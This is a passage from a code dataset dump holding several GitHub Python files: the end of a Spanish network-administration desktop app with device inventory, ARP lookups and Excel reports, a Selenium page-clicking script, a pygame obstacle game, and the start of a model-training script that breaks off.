ID_RED={aux[0]}\",db.consultarPROVEEDOR(),aux[5])\r\n elif self.indicador==\"CR\":\r\n self.ui.CR_FECHA.setText(aux[1])\r\n 
self.comboDB(self.ui.CR_RED,f\"SELECT ID_RED FROM CONTROL_RED_ESPECIFICA WHERE ID_CONTROL_RED_ESPECIFICA={aux[0]}\",db.consultarRED(),aux[2])\r\n self.ui.CR_NOINV.setText(aux[3])\r\n self.ui.CR_STAT.clear()\r\n self.ui.CR_STAT.addItem(aux[4])\r\n if aux[4]==\"Libre\": self.ui.CR_STAT.addItem(\"Ocupado\")\r\n elif aux[4]==\"Ocupado\": self.ui.CR_STAT.addItem(\"Libre\")\r\n else: \r\n self.ui.CR_STAT.addItem(\"Libre\")\r\n self.ui.CR_STAT.addItem(\"Ocupado\")\r\n self.ui.CR_HOS.setText(aux[5])\r\n self.ui.CR_IP.setText(aux[6])\r\n self.ui.CR_VEND.setText(aux[7])\r\n self.ui.CR_MAC.setText(aux[8])\r\n self.ui.CR_RESP.setText(aux[9])\r\n self.ui.CR_OBS.setText(aux[10])\r\n self.ui.CR_VERFI.clear()\r\n self.ui.CR_VERFI.addItem(aux[11])\r\n if aux[11]==\"No verificado\": \r\n self.ui.CR_VERFI.addItem(\"No permitido\")\r\n self.ui.CR_VERFI.addItem(\"Verificado\")\r\n elif aux[11]==\"Verificado\": \r\n self.ui.CR_VERFI.addItem(\"No verificado\")\r\n self.ui.CR_VERFI.addItem(\"No permitido\")\r\n elif aux[11]==\"No permitido\": \r\n self.ui.CR_VERFI.addItem(\"Verificado\")\r\n self.ui.CR_VERFI.addItem(\"No verificado\")\r\n else: \r\n self.ui.CR_VERFI.addItem(\"No verificado\")\r\n self.ui.CR_VERFI.addItem(\"Verificado\")\r\n self.ui.CR_VERFI.addItem(\"No permitido\")\r\n self.ui.CR_TIP.clear()\r\n self.ui.CR_TIP.addItem(aux[12])\r\n if aux[12]==\"Móvil\": \r\n self.ui.CR_TIP.addItem(\"Laptop\")\r\n self.ui.CR_TIP.addItem(\"Escritorio\")\r\n elif aux[12]==\"Laptop\": \r\n self.ui.CR_TIP.addItem(\"Móvil\")\r\n self.ui.CR_TIP.addItem(\"Escritorio\")\r\n elif aux[12]==\"Escritorio\": \r\n self.ui.CR_TIP.addItem(\"Móvil\")\r\n self.ui.CR_TIP.addItem(\"Laptop\")\r\n else: \r\n self.ui.CR_TIP.addItem(\"Móvil\")\r\n self.ui.CR_TIP.addItem(\"Laptop\")\r\n self.ui.CR_TIP.addItem(\"Escritorio\")\r\n self.comboDB(self.ui.CR_DEP,f\"SELECT ID_DEPARTAMENTO FROM CONTROL_RED_ESPECIFICA WHERE ID_CONTROL_RED_ESPECIFICA={aux[0]}\",db.consultarDEPARTAMENTOS(),aux[13])\r\n\r\n elif self.indicador==\"U\":\r\n self.ui.SU_ID.setText(aux[0])\r\n self.ui.SU_NOM.setText(aux[1])\r\n self.ui.SU_CORD.setText(aux[2])\r\n self.ui.SU_SERV.clear()\r\n self.ui.SU_SERV.addItem(aux[3])\r\n if aux[3]==\"Sin Servicio\": self.ui.SU_SERV.addItem(\"Con Servicio\")\r\n elif aux[3]==\"Con Servicio\": self.ui.SU_SERV.addItem(\"Sin Servicio\")\r\n else: \r\n self.ui.SU_SERV.addItem(\"Con Servicio\")\r\n self.ui.SU_SERV.addItem(\"Sin Servicio\")\r\n self.ui.SU_PROVE.setText(aux[4])\r\n self.ui.SU_OBS.setText(aux[5])\r\n self.ui.SU_FECHA.setText(aux[6])\r\n self.ui.SU_TEL.setText(aux[7])\r\n self.comboDB(self.ui.SU_TR,f\"SELECT ID_TRANSMISION FROM UNIDADES_INTERNET WHERE ID_UNIDAD='{aux[0]}'\",db.consultarTRANSMISION(),aux[8])\r\n elif self.indicador==\"D\":\r\n self.ui.D_NOM.setText(aux[1])\r\n self.ui.D_DES.setText(aux[2])\r\n def limpiarCampos(self):\r\n if self.indicadorV==\"PR\":\r\n self.ui.PR_DESC.setText(\"\")\r\n self.ui.PR_FECHA.setText(\"\")\r\n self.ui.PR_SOL.setText(\"\")\r\n self.ui.PR_DEP.clear()\r\n self.ui.PR_COR.clear()\r\n self.ui.PR_COR.addItem(\"Corregido\")\r\n self.ui.PR_COR.addItem(\"No corregido\")\r\n self.ui.PR_FECHAC.setText(\"\")\r\n\r\n self.comboDBD(self.ui.PR_RED,db.consultarRED())\r\n self.comboDBD(self.ui.PR_DEP,db.consultarDEPARTAMENTOS())\r\n \r\n elif self.indicador==\"R\":\r\n self.ui.R_Folio.setText(\"\")\r\n self.ui.R_Descrip.setText(\"\")\r\n self.ui.R_Fecha.setText(\"\")\r\n self.ui.R_ACUDIO.clear()\r\n self.ui.R_ACUDIO.addItem(\"Acudio al sitio\")\r\n self.ui.R_ACUDIO.addItem(\"No acudio al sitio\")\r\n 
self.ui.R_REMOSIT.clear()\r\n            self.ui.R_REMOSIT.addItem(\"Procedimiento de manera Remota\")\r\n            self.ui.R_REMOSIT.addItem(\"Procedimientos en Sitio\")\r\n            self.ui.R_MOT.setText(\"\")\r\n            self.ui.R_TEL.setText(\"\")\r\n            self.ui.R_ATEND.setText(\"\")\r\n            self.comboDBD(self.ui.R_PROV,db.consultarPROVEEDOR())\r\n        elif self.indicador==\"I\":\r\n            self.ui.I_ID.setText(\"\")\r\n            self.ui.I_NOM.setText(\"\")\r\n            self.ui.I_DESC.setText(\"\")\r\n            self.ui.I_UBI.setText(\"\")\r\n            self.ui.I_TC.clear()\r\n            self.ui.I_TC.addItem(\"Alambrica\")\r\n            self.ui.I_TC.addItem(\"Inalámbrica\")\r\n            self.ui.I_TC.addItem(\"No Aplica\")\r\n            self.comboDBD(self.ui.I_RED,db.consultarRED())\r\n            self.comboDBD(self.ui.I_DEP,db.consultarDEPARTAMENTOS())\r\n        elif self.indicador==\"P\":\r\n            self.ui.P_N.setText(\"\")\r\n            self.ui.P_DES.setText(\"\")\r\n            self.ui.P_FECH.setText(\"\")\r\n            self.ui.P_TEL.setText(\"\")\r\n            self.comboDBD(self.ui.P_TR,db.consultarTRANSMISION())\r\n        elif self.indicador==\"RD\":\r\n            self.ui.RD_S.setText(\"\")\r\n            self.ui.RD_PASS.setText(\"\")\r\n            self.ui.RD_SUB.setText(\"\")\r\n            self.ui.RD_DAJ.setText(\"\")\r\n            self.comboDBD(self.ui.RD_PROV,db.consultarPROVEEDOR())\r\n        elif self.indicador==\"CR\":\r\n            self.ui.CR_FECHA.setText(\"\")\r\n            self.comboDBD(self.ui.CR_RED,db.consultarRED())\r\n            self.ui.CR_NOINV.setText(\"\")\r\n            self.ui.CR_STAT.clear()\r\n            self.ui.CR_STAT.addItem(\"Libre\")\r\n            self.ui.CR_STAT.addItem(\"Ocupado\")\r\n            self.ui.CR_VERFI.clear()\r\n            self.ui.CR_VERFI.addItem(\"No verificado\")\r\n            self.ui.CR_VERFI.addItem(\"Verificado\")\r\n            self.ui.CR_VERFI.addItem(\"No permitido\")\r\n            self.ui.CR_HOS.setText(\"\")\r\n            self.ui.CR_IP.setText(\"\")\r\n            self.ui.CR_VEND.setText(\"\")\r\n            self.ui.CR_MAC.setText(\"\")\r\n            self.ui.CR_RESP.setText(\"\")\r\n            self.ui.CR_OBS.setText(\"\")\r\n            self.ui.CR_TIP.clear()\r\n            self.ui.CR_TIP.addItem(\"Móvil\")\r\n            self.ui.CR_TIP.addItem(\"Laptop\")\r\n            self.ui.CR_TIP.addItem(\"Escritorio\")\r\n\r\n        elif self.indicador==\"U\":\r\n            self.ui.SU_ID.setText(\"\")\r\n            self.ui.SU_NOM.setText(\"\")\r\n            self.ui.SU_CORD.setText(\"\")\r\n            self.ui.SU_SERV.clear()\r\n            self.ui.SU_SERV.addItem(\"Con Servicio\")\r\n            self.ui.SU_SERV.addItem(\"Sin Servicio\")\r\n            self.ui.SU_PROVE.setText(\"\")\r\n            self.ui.SU_OBS.setText(\"\")\r\n            self.ui.SU_FECHA.setText(\"\")\r\n            self.ui.SU_TEL.setText(\"\")\r\n            self.comboDBD(self.ui.SU_TR,db.consultarTRANSMISION())\r\n        elif self.indicador==\"D\":\r\n            self.ui.D_NOM.setText(\"\")\r\n            self.ui.D_DES.setText(\"\")\r\n    def comboDB(self,combo,consulta,dep,val):\r\n        combo.clear()\r\n        a=db.consultar(consulta)\r\n        combo.addItem(str(a[0][0])+\":\"+val)\r\n        for i in dep: \r\n            if str(a[0][0])+\":\"+val!=str(i[0])+\":\"+i[1]:\r\n                combo.addItem(str(i[0])+\":\"+i[1])\r\n    def comboDBD(self,combo,dep):\r\n        combo.clear()\r\n        for i in dep: combo.addItem(str(i[0])+\":\"+i[1])\r\n    def Filtrar(self):\r\n        self.Filtrado=self.ui.GFiltrado.text()\r\n        if self.Filtrado==\"\" or self.Filtrado.replace(\" \",\"\").replace(\"\\t\",\"\")==\"\":\r\n            self.Filtrado=\"*_*_*\"\r\n        if self.indicador==\"PR\": self.DBproblemasRed()\r\n        elif self.indicador==\"R\": self.DBreportes()\r\n        elif self.indicador==\"I\": self.DBinvernario()\r\n        elif self.indicador==\"P\": self.DBProveedores()\r\n        elif self.indicador==\"RD\": self.DBRedes()\r\n        elif self.indicador==\"C\": self.DBConexiones()\r\n        elif self.indicador==\"H\": self.DBHosts()\r\n        elif self.indicador==\"CR\": self.DBControlRed()\r\n        elif self.indicador==\"U\": self.DBUnidades()\r\n        elif self.indicador==\"D\": self.DBDepartamentos()\r\n    def redesR(self):\r\n        redes= sb.run([\"netsh\", \"wlan\", \"show\",\"profile\"], 
capture_output=True, text=True).stdout\r\n ls=redes.split(\"\\n\")\r\n redes=[]\r\n for i in ls:\r\n if \":\" in i and \"actual\" not in i and \"current\" not in i:\r\n aux=i.split(\":\")[1]\r\n if aux!=\"\":\r\n redes.append(aux.strip())\r\n return redes\r\n def CambiosRed(self):\r\n while self.inf.SALIR!=True:\r\n SSID=rs.obtener_SSID(self.inf.INTERFAZ)\r\n INTER=rs.Obtener_Dispositivos(False)\r\n auxIP=\"\"\r\n for dis in INTER:\r\n if dis[0]==self.inf.INTERFAZ:\r\n auxIP=dis[3]\r\n self.inf.auxGate=dis[5] \r\n break\r\n if SSID==\"SIN CONEXION\" or (self.inf.auxGate==\"--\" or self.inf.auxGate==\"\"):\r\n print(\"[i] No hay conexión en la interfaz \"+self.inf.INTERFAZ)\r\n self.inf.SSID=\"SIN CONEXION\"\r\n self.inf.CONEXION=False\r\n self.inf.IPV4=\"--\"\r\n self.inf.GATEWAY=\"--\"\r\n self.ui.UserBtn.setText(\"\")\r\n self.ui.label_5.setText(f\"
Red: {self.inf.SSID}      IPv4: {self.inf.IPV4}      Gateway: {self.inf.GATEWAY}
\")\r\n self.actualizarDatosDash()\r\n self.inf.CAMBIOS=False\r\n self.ui.SpeedRed.setText(self.inf.SSID)\r\n else:\r\n if SSID=='NO TIENE' and \"ETHER\" in self.inf.INTERFAZ.upper():\r\n if self.inf.auxGate != self.inf.GATEWAY:\r\n print(\"[!] Cambios en red. (Cableada)\")\r\n self.inf.CAMBIOS=True\r\n self.inf.IPV4=auxIP\r\n self.inf.GATEWAY=self.inf.auxGate \r\n try:\r\n SSID=str(socket.getfqdn(self.inf.GATEWAY))\r\n if SSID==self.inf.GATEWAY:\r\n try:\r\n SSID=str(rs.get_mac_details(rs.escanearARP_U(self.inf.GATEWAY,self.inf.INTERFAZ,3,False)[1]))\r\n except:\r\n SSID=self.inf.GATEWAY\r\n except:\r\n try:\r\n SSID=str(rs.get_mac_details(rs.escanearARP_U(self.inf.GATEWAY,self.inf.INTERFAZ,3,False)[1]))\r\n except:\r\n SSID=self.inf.GATEWAY \r\n self.inf.SSID=SSID\r\n self.inf.CONEXION=True\r\n aux=db.consultarRED()\r\n encontrado=False\r\n for i in aux:\r\n if i[1]==self.inf.SSID:\r\n encontrado=True\r\n if encontrado==False and self.inf.SSID!='POR DEFECTO' and self.inf.SSID!='SIN CONEXION':\r\n db.insertarRED(self.inf.SSID,\"Pendiente\",0,0,1)\r\n self.ui.label_5.setText(f\"
Red: {self.inf.SSID}      IPv4: {self.inf.IPV4}      Gateway: {self.inf.GATEWAY}
\")\r\n self.actualizarDatosDash()\r\n self.ui.UserBtn.setText(\"\")\r\n self.inf.CAMBIOS=False\r\n self.ui.SpeedRed.setText(self.inf.SSID)\r\n self.tab.emit(1)\r\n elif self.inf.SSID!=SSID and SSID != \"NO TIENE\":\r\n print(\"[!] Cambios en red. (Inalambrica)\")\r\n self.inf.CAMBIOS=True\r\n self.inf.IPV4=auxIP\r\n self.inf.GATEWAY=self.inf.auxGate \r\n self.inf.SSID=SSID\r\n self.inf.CONEXION=True\r\n self.ui.UserBtn.setText(\"\")\r\n sleep(1)\r\n aux=db.consultarRED()\r\n encontrado=False\r\n for i in aux:\r\n if i[1]==self.inf.SSID:\r\n encontrado=True\r\n if encontrado==False and self.inf.SSID!='POR DEFECTO' and self.inf.SSID in self.redesR():\r\n db.insertarRED(self.inf.SSID,\"Pendiente\",0,0,1)\r\n self.ui.label_5.setText(f\"
Red: {self.inf.SSID}      IPv4: {self.inf.IPV4}      Gateway: {self.inf.GATEWAY}
\")\r\n self.actualizarDatosDash()\r\n self.inf.CAMBIOS=False\r\n self.ui.SpeedRed.setText(self.inf.SSID)\r\n self.tab.emit(1)\r\n sleep(1)\r\n def RGeneral(self):\r\n archivo=\"Gtmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Redes\"\r\n hoja.append(('ID','SSID','CONTRASEÑA','SUBIDA','BAJADA','PROVEEDOR'))\r\n consulta=db.consultarRED()\r\n for i in consulta:\r\n hoja.append(i)\r\n hoja1=wb.create_sheet(\"Pruebas\")\r\n hoja1.append(('ID','FECHA','HORA','HOST','SPONSOR','RED','SUBIDA','BAJADA','LATENCIA(S)','LATENCIA(B)','PING','RESULTADO'))\r\n consulta=db.consultarPRUEBAS_VELOCIDAD()\r\n for i in consulta:\r\n hoja1.append(i)\r\n hoja2=wb.create_sheet(\"Reportes\")\r\n hoja2.append(('ID','FOLIO','DESCRIPCION','FECHA','ACUDIO','REMOTO/SITIO','MOTIVO','TELEFONO','ATENDIO','PROVEEDOR'))\r\n consulta=db.consultarREPORTES()\r\n for i in consulta:\r\n hoja2.append(i)\r\n hoja3=wb.create_sheet(\"Unidades Internet\")\r\n hoja3.append(('ID','NOMBRE','COORDINACION','CON INTENERT','PROVEEDOR','OBSERVACIONES','FECHA','TELEFONO','TIPO TRANSMISIÓN'))\r\n consulta=db.consultarUNIDADES_INTERNET()\r\n for i in consulta:\r\n hoja3.append(i)\r\n hoja4=wb.create_sheet(\"Control de red\")\r\n hoja4.append(('ID','FECHA','SSID','NO. INVENTARIO','ESTADO','HOST','IPV4','VENDOR','MAC','USUARIO','OBSERVACIONES','VERIFICADO','TIPO','DEPARTAMENTO'))\r\n consulta=db.consultarCONTROL_RED_ESPECIFICA()\r\n for i in consulta:\r\n hoja4.append(i)\r\n hoja5=wb.create_sheet(\"Numero de conexiones\")\r\n hoja5.append(('ID','SSID','FECHA','CONEXIONES'))\r\n consulta=db.consultarHISTORIAL_NUM_CONEXIONES()\r\n for i in consulta:\r\n hoja5.append(i)\r\n hoja6=wb.create_sheet(\"Historial de dispositivos\")\r\n hoja6.append(('ID','FECHA','SSID','HOST','IPV4','MAC','VENDOR'))\r\n consulta=db.consultarHISTORIAL_CONEXIONES()\r\n for i in consulta:\r\n hoja6.append(i)\r\n hoja7=wb.create_sheet(\"Proveedores\")\r\n hoja7.append(('ID','NOMBRE','DESCRIPCION','FECHA','TELEFONO','TIPO'))\r\n consulta=db.consultarPROVEEDOR()\r\n for i in consulta:\r\n hoja7.append(i)\r\n hoja8=wb.create_sheet(\"Inventario\")\r\n hoja8.append(('ID','NO.INVENTARIO','NOMBRE','DESCRIPCION','UBICACION','TIPO','RED','DEPARTAMENTO'))\r\n consulta=db.consultarDISPOSITIVOS()\r\n for i in consulta:\r\n hoja8.append(i)\r\n hoja9=wb.create_sheet(\"Departamentos\")\r\n hoja9.append(('ID','NOMBRE','DESCRIPCION'))\r\n consulta=db.consultarDEPARTAMENTOS()\r\n for i in consulta:\r\n hoja9.append(i)\r\n hoja10=wb.create_sheet(\"Problemas red\")\r\n hoja10.append(('ID','Descripción','Fecha','Solución','Corregido','Fecha corrección','Red','Departamento'))\r\n consulta=db.consultarPROBLEMAS_RED()\r\n for i in consulta:\r\n hoja10.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RVelocidad(self):\r\n archivo=\"Vtmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Pruebas\"\r\n hoja.append(('ID','FECHA','HORA','HOST','SPONSOR','RED','SUBIDA','BAJADA','LATENCIA(S)','LATENCIA(B)','PING','RESULTADO'))\r\n consulta=db.consultarPRUEBAS_VELOCIDAD()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RServicio(self):\r\n archivo=\"Stmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Reportes\"\r\n hoja.append(('ID','FOLIO','DESCRIPCION','FECHA','ACUDIO','REMOTO/SITIO','MOTIVO','TELEFONO','ATENDIO','PROVEEDOR'))\r\n consulta=db.consultarREPORTES()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def 
RClues(self):\r\n archivo=\"Ctmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Unidades con Internet\"\r\n hoja.append(('ID','NOMBRE','CORD','CON INTENERT','PROVEEDOR','OBSERVACIONES','FECHA','TELEFONO','TIPO TRANSMISIÓN'))\r\n consulta=db.consultarUNIDADES_INTERNET()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RDisp(self):\r\n archivo=\"CRtmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"HOST\"\r\n hoja.append(('ID','FECHA','SSID','NO. INVENTARIO','ESTADO','HOST','IPV4','VENDOR','MAC','USUARIO','OBSERVACIONES','VERIFICADO','TIPO','DEPARTAMENTO'))\r\n consulta=db.consultarCONTROL_RED_ESPECIFICA()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RHistorial(self):\r\n archivo=\"Htmp.xlsx\"\r\n wb = Workbook()\r\n hoja1=wb.active\r\n hoja1.title=\"Numero de conexiones\"\r\n hoja1.append(('ID','SSID','FECHA','CONEXIONES'))\r\n consulta=db.consultarHISTORIAL_NUM_CONEXIONES()\r\n for i in consulta:\r\n hoja1.append(i)\r\n hoja2=wb.create_sheet(\"Historial de dispositivos\")\r\n hoja2.append(('ID','FECHA','SSID','HOST','IPV4','MAC','VENDOR'))\r\n consulta=db.consultarHISTORIAL_CONEXIONES()\r\n for i in consulta:\r\n hoja2.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RProveedores(self):\r\n archivo=\"Ptmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Proveedores\"\r\n hoja.append(('ID','NOMBRE','DESCRIPCION','FECHA','TELEFONO','TIPO'))\r\n consulta=db.consultarPROVEEDOR()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RInventario(self):\r\n archivo=\"Itmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Inventario\"\r\n hoja.append(('ID','NO.INVENTARIO','NOMBRE','DESCRIPCION','UBICACION','TIPO','RED','DEPARTAMENTO'))\r\n consulta=db.consultarDISPOSITIVOS()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def RProblemas(self):\r\n archivo=\"PRtmp.xlsx\"\r\n wb = Workbook()\r\n hoja=wb.active\r\n hoja.title=\"Problemas\"\r\n hoja.append(('ID','Descripción','Fecha','Solución','Corregido','Fecha corrección','Red','Departamento'))\r\n consulta=db.consultarPROBLEMAS_RED()\r\n for i in consulta:\r\n hoja.append(i)\r\n wb.save(archivo)\r\n os.system(\"start \"+archivo)\r\n def BRHistorial(self):\r\n db.ejecutarAccion(\"DELETE FROM HISTORIAL_NUM_CONEXIONES\")\r\n db.ejecutarAccion(\"DELETE FROM HISTORIAL_CONEXIONES\")\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Base de Datos\",\"Se ha borrado el historial de red.\"])\r\n self.mostrarErrores()\r\n def BRServicio(self):\r\n db.ejecutarAccion(\"DELETE FROM REPORTES\")\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Base de Datos\",\"Se ha borrado los reportes de servicio.\"])\r\n def BRPruebas(self):\r\n db.ejecutarAccion(\"DELETE FROM PRUEBAS_VELOCIDAD\")\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Base de Datos\",\"Se ha borrado las pruebas de red.\"])\r\n def BRProblemas(self):\r\n db.ejecutarAccion(\"DELETE FROM PROBLEMAS_RED\")\r\n self.inf.Errores.append([f\"{dt.now().hour}:{dt.now().minute}\",\"Base de Datos\",\"Se ha borrado los problemas de red.\"])\r\n def VMac(self):\r\n redes= sb.run([\"getmac\"], capture_output=True, text=True).stdout\r\n self.ui.SalidaVar.setHtml(str(redes.replace(\"\\n\",\"
\")))\r\n def VARP(self):\r\n A,disp,ips=rs.escanearARP(self.inf.GATEWAY+\"/24\",self.inf.INTERFAZ)\r\n ARP=\"\"\r\n ARP+=\"Respuesta a solicitudes ARP
\"\r\n for i in disp:\r\n ARP+=i[0]+\"   \"+i[1]+\"
\"\r\n self.ui.SalidaVar.setHtml(ARP)\r\n def speedtest(self):\r\n WebOpen('https://www.speedtest.net/')\r\n def fast(self):\r\n WebOpen('https://fast.com/es/')\r\n def MRed(self):\r\n os.system(\"start ncpa.cpl\")\r\n def MTareas(self):\r\n os.system(\"start taskmgr\")\r\n def RCompartidos(self):\r\n WebOpen(self.inf.GATEWAY)\r\n def cmd(self):\r\n os.system(\"start cmd\")\r\n def errores(self):\r\n Widget=QWidget()\r\n aux=QVBoxLayout()\r\n if len(self.inf.Errores)>0:\r\n for i in self.inf.Errores:\r\n auxWid=QFrame()\r\n auxW=QGridLayout()\r\n label=QLabel()\r\n pixmap = QPixmap('Imagenes/ALERT.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n auxW.addWidget(label,0,0)\r\n auxW.addWidget(QLabel(i[0]),0,1)\r\n auxW.addWidget(QLabel(i[1]),0,2)\r\n auxW.addWidget(QLabel(i[2]),0,3)\r\n auxWid.setLayout(auxW)\r\n aux.addWidget(auxWid)\r\n else:\r\n auxWid=QFrame()\r\n auxW=QGridLayout()\r\n label=QLabel()\r\n pixmap = QPixmap('Imagenes/CORRECTO.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n auxW.addWidget(label,0,0)\r\n auxW.addWidget(QLabel(\"No hay nada nuevo que informar.\"),0,1)\r\n auxWid.setLayout(auxW)\r\n aux.addWidget(auxWid)\r\n Widget.setLayout(aux)\r\n self.ui.NotificacionesW.setWidget(Widget)\r\n def SignalAlerta(self):\r\n self.Alerta()\r\n def mostrarErrores(self):\r\n if len(self.inf.Errores)>0:\r\n self.SignalA.emit(1)\r\n def BorrarNo(self):\r\n self.inf.Errores=[]\r\n Widget=QWidget()\r\n aux=QVBoxLayout()\r\n auxWid=QFrame()\r\n auxW=QGridLayout()\r\n label=QLabel()\r\n pixmap = QPixmap('Imagenes/CORRECTO.png').scaled(50,50)\r\n label.setPixmap(pixmap)\r\n auxW.addWidget(label,0,0)\r\n auxW.addWidget(QLabel(\"No hay nada nuevo que informar.\"),0,1)\r\n auxWid.setLayout(auxW)\r\n aux.addWidget(auxWid)\r\n Widget.setLayout(aux)\r\n self.ui.NotificacionesW.setWidget(Widget)\r\n Widget.setLayout(aux)\r\n self.ui.NotificacionesW.setWidget(Widget)\r\n \r\nif __name__ == \"__main__\":\r\n app = QApplication(sys.argv)\r\n window = MainWindow()\r\n window.show()\r\n\r\n sys.exit(app.exec())","repo_name":"JulioPonceCamacho/SystemToManageNetwork","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":142850,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72016559849","text":"import time\n\nfrom selenium import webdriver\nfrom selenium.common import NoSuchElementException\nfrom selenium.webdriver.common.by import By\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.chrome.options import Options\n\noptions = Options()\noptions.add_experimental_option('excludeSwitches', ['enable-automation'])\n\ndriver = webdriver.Chrome(ChromeDriverManager().install(), options=options)\ndriver.maximize_window()\n# driver.get(\"https://mail.yandex.com/\")\ndriver.get(\"https://mail360.yandex.com/premium-plans?from=mail_landing\")\ndriver.implicitly_wait(10)\ntry:\n button = driver.find_element(by=By.XPATH, value='/html/body/div/div[2]/div/div[3]/section[1]/div/a[2]')\n print(f'button:{button}')\n button.click()\nexcept NoSuchElementException as e:\n print(\"没找到按钮\")\n driver.quit();\n\ntime.sleep(5)\n","repo_name":"ssxyyds/python","sub_path":"Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":849,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"75076296487","text":"import pygame\nimport 
random\npygame.init()\nwidth=480\nheight=360\nscreen=pygame.display.set_mode((width,height))\npygame.display.set_caption(\"skatter BOy\")\n\n#images\n\nroad=pygame.image.load(\"roada.jpg\")\nrwh=road.get_size()\nclock=pygame.time.Clock()\n\n#color\nWHITE=(255,255,255)\nBLACK=(0,0,0)\nRED=(255,0,0)\nYELLOW=(237,218,15)\nORANGE =(237,118,15)\n\nx1=0\nx2=0\nx3=0\nsx=470\nsy=int(rwh[0]/2)\ncx=30\ncy=int(rwh[1]/2)\ncx_c=0\ncy_c=0\ns=0\nry=random.randrange(rwh[1])\ndef msg(text,color,x,y,size=25):\n font=pygame.font.SysFont(None,size)\n msg=font.render(text,True,color,)\n screen.blit(msg,(x,y))\n \ndef explosion(e_x,e_y):\n mag=1\n clock.tick(10)\n color=[RED,YELLOW,ORANGE]\n while True:\n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n pygame.quit\n quit()\n e_x=e_x+random.randrange(-1*mag,mag)\n e_y=e_y+random.randrange(-1*mag,mag)\n mag+=1\n if mag==30:\n break\n pygame.draw.circle(screen,color[random.randrange(0,3)],(e_x,e_y),5)\n \nwhile True:\n \n for event in pygame.event.get():\n if event.type==pygame.QUIT:\n pygame.quit()\n quit()\n if event.type==pygame.KEYDOWN:\n if event.key==pygame.K_ESCAPE:\n pygame.quit()\n quit()\n if event.key==pygame.K_UP:\n cy_c-=3\n if event.key==pygame.K_DOWN:\n cy_c+=3\n if event.key==pygame.K_RIGHT:\n cx_c+=3\n if event.key==pygame.K_LEFT:\n cx_c-=3 \n \n if event.type==pygame.KEYUP:\n if event.key==pygame.K_UP or event.key==pygame.K_DOWN:\n cy_c=0\n if event.key==pygame.K_LEFT or event.key==pygame.K_RIGHT:\n \n cx_c=0\n cx+=cx_c\n cy+=cy_c\n \n if x1+rwh[0]<0:\n x1=width\n if x2+2*rwh[0]<0:\n x2=width-rwh[0]\n\n if x3+3*rwh[0]<0:\n x3=width-2*rwh[0]\n \n \n if sx+30<0:\n sx=width\n ry=random.randrange(rwh[1]-30)\n\n sx-=10\n x1-=10\n x3-=10\n x2-=10\n screen.fill(WHITE)\n screen.blit(road,(x1,5))\n screen.blit(road,(x2+rwh[0],5))\n screen.blit(road,(x3+2*rwh[0],5))\n stone=pygame.draw.rect(screen,BLACK,(sx,ry,30,30))\n car =pygame.draw.circle(screen,WHITE,(40+cx,cy,),18)\n if stone.colliderect(car):\n sx=width\n ry=random.randrange(rwh[1]-30)\n explosion(40+cx,cy)\n s+=1\n \n msg(\"score:\"+str(s),BLACK,50,190) \n\n pygame.display.update()\n clock.tick(20)\n","repo_name":"mandeepmourya007/my-game","sub_path":"skater.py","file_name":"skater.py","file_ext":"py","file_size_in_byte":2587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"29595911255","text":"import argparse\nimport json\nfrom collections import Counter\nimport random\n\nimport numpy as np\nimport pandas as pd\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom tqdm import tqdm, trange\nimport time\nfrom Modules.MLP import ourModel\nfrom Modules.MLP import train_epoch\nfrom utils.dataset import DoctorRecDataset\nfrom utils.EarlyStopping import EarlyStopping\nfrom utils.loss import weighted_class_bceloss\nfrom utils.config import init_opts, train_opts, multihead_att_opts\n\nfrom utils.util import save_pickle, load_pickle\nfrom transformers import AdamW, BertModel, BertTokenizer, get_linear_schedule_with_warmup\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--seed', default=2021, type=int)\nparser.add_argument('--gpu', default=0, type=int)\nparser.add_argument('--name', default=\"med-bert\", type=str)\nparser.add_argument('--cleaned_path', default='./cleaned', type=str)\n\nparser.add_argument('--dr_dialog_sample', default=2, type=int)\nparser.add_argument('--neg_sample', default=2, type=int)\nparser.add_argument('--batch_size', default=2, 
